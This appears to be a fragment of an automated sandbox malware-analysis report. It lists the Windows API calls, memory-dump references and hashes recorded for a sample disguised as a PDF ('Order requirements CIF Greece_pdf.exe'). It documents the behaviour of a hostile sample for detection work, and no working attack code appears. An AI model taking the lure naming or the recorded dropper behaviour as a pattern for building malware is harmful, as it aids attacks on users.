                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Enum$CloseValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 397863658-0
                                                                                                                                        • Opcode ID: 5b71ec222b19f08e17faa31cd346880740b6c824b10cdee8db70d0fa459cde75
                                                                                                                                        • Instruction ID: 773a7303ee78c1acb854ba03901dd4e05cd3950a579afad538e8a0ffc4c9b84d
                                                                                                                                        • Opcode Fuzzy Hash: 5b71ec222b19f08e17faa31cd346880740b6c824b10cdee8db70d0fa459cde75
                                                                                                                                        • Instruction Fuzzy Hash: 5A018F71604204FFE7219F54DE99ABF7ABCEF41358F20803EF505B61C0DAB84E459629
                                                                                                                                        APIs
                                                                                                                                        • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402546
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,hattepuldes\Stethospasm84\,00000000,?,00000000,00000002,00000011,00000002), ref: 004025E5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseQueryValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3356406503-0
                                                                                                                                        • Opcode ID: bd6cd76112630bcbd7e0f5c7a8ef03fc241a29f4c9c3f225f081d49a75508afb
                                                                                                                                        • Instruction ID: a38d896beb00bd6b96c1afca0a4d37843b6a01bbd6b744c8c042ddc4311e4418
                                                                                                                                        • Opcode Fuzzy Hash: bd6cd76112630bcbd7e0f5c7a8ef03fc241a29f4c9c3f225f081d49a75508afb
                                                                                                                                        • Instruction Fuzzy Hash: E911BF71901205EFDF24CF64CA985AE7AB4EF01355F20843FE446B72C0D6B88A85DB19
                                                                                                                                        APIs
                                                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                        • Opcode ID: e0cd62ee3040700a295e5b46d32f75e08d2db3f93dbac9e55f4e6f2709676977
                                                                                                                                        • Instruction ID: 845b7e25721e970e15b242f5633496821e9acd9660688f654d55c439198c0cfc
                                                                                                                                        • Opcode Fuzzy Hash: e0cd62ee3040700a295e5b46d32f75e08d2db3f93dbac9e55f4e6f2709676977
                                                                                                                                        • Instruction Fuzzy Hash: 0701F4316242209FE7195B389D04B2A3698E751314F10813FF951F65F2D678CC129B4C
                                                                                                                                        APIs
                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$EnableShow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1136574915-0
                                                                                                                                        • Opcode ID: 0ff81ee1c010caf08d5018515d9ac3da577e4609dff467edd0ef4c3ea6212f24
                                                                                                                                        • Instruction ID: 0d648207ff9f6deaa2b416c319ca4d02dfd5ede2de2ab3ccb6edf8448476ab2e
                                                                                                                                        • Opcode Fuzzy Hash: 0ff81ee1c010caf08d5018515d9ac3da577e4609dff467edd0ef4c3ea6212f24
                                                                                                                                        • Instruction Fuzzy Hash: 3AE09232A04200EFD714EFA5EA8856F7BB0EB40325B20403FF001F10C1CA7848418A59
                                                                                                                                        APIs
                                                                                                                                        • ShowWindow.USER32(00010494), ref: 00401581
                                                                                                                                        • ShowWindow.USER32(0001048E), ref: 00401596
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ShowWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1268545403-0
                                                                                                                                        • Opcode ID: 651c37bc6638362237d797d4381c0091f2d3ab27754a1e837ea31ce37a84f4b0
                                                                                                                                        • Instruction ID: 3a11bc7633d557fca9bfeaeb01eb6d797b1cc6e91976234f83cec9dd727a21ac
                                                                                                                                        • Opcode Fuzzy Hash: 651c37bc6638362237d797d4381c0091f2d3ab27754a1e837ea31ce37a84f4b0
                                                                                                                                        • Instruction Fuzzy Hash: 66E086727101109FC718DF58ED9087F73A5EBC5310310853FE603B3291C6789D018E28
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,?,00403398,0000000B), ref: 004064EF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040650A
                                                                                                                                          • Part of subcall function 0040646F: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406486
                                                                                                                                          • Part of subcall function 0040646F: wsprintfA.USER32 ref: 004064BF
                                                                                                                                          • Part of subcall function 0040646F: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064D3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2547128583-0
                                                                                                                                        • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                                                                                                        • Instruction ID: 042920e8a29c9b7d047f9b8d679db2b98f9cdac4fa712678353772f8bdeb7375
                                                                                                                                        • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                                                                                                        • Instruction Fuzzy Hash: 6EE0863260421167D6105B70BE0493B72A89E84700302043EF546F6144DB38DC769A6D
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe,80000000,00000003), ref: 00405C71
                                                                                                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 415043291-0
                                                                                                                                        • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                                                                                        • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                                                                                                        • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                                                                                        • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00405860,?,?,00000000,00405A43,?,?,?,?), ref: 00405C4D
                                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C61
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                                                                                        • Instruction ID: 7e700ee3acf44982365c3fbd0e808c401ff2a4825d9ccd2943b1641dd8ae7ae4
                                                                                                                                        • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                                                                                        • Instruction Fuzzy Hash: ABD0A932004022ABC2002728AE0C88BBB90DB00270702CA35FCA4A22B1DB300C529A98
                                                                                                                                        APIs
                                                                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,00403318,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00405744
                                                                                                                                        • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405752
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1375471231-0
                                                                                                                                        • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                                                                                        • Instruction ID: 5acf7b5c2778cbfdcbae9b0437cf869adc97d3df665aa26c8b081b4f29c10bb0
                                                                                                                                        • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                                                                                        • Instruction Fuzzy Hash: 53C04C30204501EFDA106B209E08B177AD0AB50741F2548396146E10A0DA789455F92E
                                                                                                                                        APIs
                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023D5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PrivateProfileStringWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 390214022-0
                                                                                                                                        • Opcode ID: ba3bde256958aa91b5d9155f67b7e0bfbb45c1f83cf4986586dcfc7af96a5ed0
                                                                                                                                        • Instruction ID: a2264a5e3b04165b7de03e79847980bb6a424129cbe2f78830b73284cd35be0b
                                                                                                                                        • Opcode Fuzzy Hash: ba3bde256958aa91b5d9155f67b7e0bfbb45c1f83cf4986586dcfc7af96a5ed0
                                                                                                                                        • Instruction Fuzzy Hash: F8E04831610114ABD7203EB14F8D97F31A9DB44304B34153FBA11761C6D9FC5C414279
                                                                                                                                        APIs
                                                                                                                                        • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PathSearch
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2203818243-0
                                                                                                                                        • Opcode ID: d14bdcf4c531334952570e8fbab461e107b4b7945dcdc90744cade2c00435980
                                                                                                                                        • Instruction ID: eb17f69382d89759ebdee5c9dd5d6a4f0c1420afe9db4a8697d1259c8666677d
                                                                                                                                        • Opcode Fuzzy Hash: d14bdcf4c531334952570e8fbab461e107b4b7945dcdc90744cade2c00435980
                                                                                                                                        • Instruction Fuzzy Hash: 80E0D871304110EFD710DF649E49BAB3758DB01368B20817AF111A60C1D5B89905872D
                                                                                                                                        APIs
                                                                                                                                        • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402C7F,00000000,?,?), ref: 00405FB1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
